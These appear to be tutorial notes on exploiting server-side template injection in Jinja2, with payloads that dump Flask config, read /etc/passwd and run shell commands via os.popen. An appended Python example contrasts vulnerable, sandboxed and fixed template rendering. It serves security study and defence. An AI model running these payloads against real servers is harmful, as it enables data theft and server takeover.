Exploiting SSTI - Jinja2

Exploitation Techniques

  1. Understanding Jinja2:

    • Jinja2 is commonly used in Python web frameworks like Flask and Django.

    • You can leverage libraries already imported by the application, and potentially import additional libraries.

  2. Information Disclosure:

    • Dump Application Configuration:

      • Use the following payload to obtain internal configuration details:

        {{ config.items() }}
      • Access the application at:

        http://<SERVER_IP>:<PORT>/
    • Dump Built-in Functions:

      • To get a list of available built-in functions, use:

        {{ self.__init__.__globals__.__builtins__ }}
      • This can help you understand what functions you can exploit.

  3. Local File Inclusion (LFI):

    • To read local files, use the open function from the built-ins:

      • Payload to read /etc/passwd:

        {{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}
      • Access the application at:

http://<SERVER_IP>:<PORT>/
  4. Remote Code Execution (RCE):

    • To execute commands on the server, you can use functions from the os library:

      • First, import the os library and then execute a command:

        {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
      • This payload will execute the id command and return the result.

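Added example, not part of these notes: the injection point every payload above relies on is user input being spliced into the template source, shown here with plain Jinja2 rather than Flask and a constructed stand-in for the application config. It also shows that SandboxedEnvironment blocks the __init__/__globals__/__builtins__ walk but still exposes whatever is placed in the template context, so only keeping user input out of the template source is a real fix.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-in for the Flask `config` object that {{ config.items() }} dumps.
APP_CONFIG = {"SECRET_KEY": "constructed-secret-value", "DEBUG": False}


def render_vulnerable(user_input: str) -> str:
    """User input is concatenated into the template SOURCE, so Jinja2
    parses it as template code: this is the SSTI the notes exploit."""
    template = Environment().from_string("Hello " + user_input)
    return template.render(config=APP_CONFIG)


def render_sandboxed(user_input: str) -> str:
    """Same mistake under SandboxedEnvironment. The sandbox refuses the
    __init__/__globals__/__builtins__ walk (SecurityError), but anything
    handed to the context, here `config`, is still readable, so it is
    defence in depth, not a fix for the injection itself."""
    template = SandboxedEnvironment().from_string("Hello " + user_input)
    return template.render(config=APP_CONFIG)


def render_fixed(user_input: str) -> str:
    """Template source is a constant; user input travels only as DATA via
    the context and is autoescaped, so {{ ... }} in it is rendered literally."""
    env = Environment(autoescape=True)
    template = env.from_string("Hello {{ name }}")
    return template.render(name=user_input, config=APP_CONFIG)


if __name__ == "__main__":
    probe = "{{ config.items() }}"
    print(render_vulnerable(probe))  # leaks the config dict
    print(render_sandboxed(probe))   # still leaks the config dict
    print(render_fixed(probe))       # Hello {{ config.items() }}
```

The same three-way check is a cheap regression test to keep in a project's suite: any view that renders user-controlled text through render_template_string or from_string should behave like render_fixed.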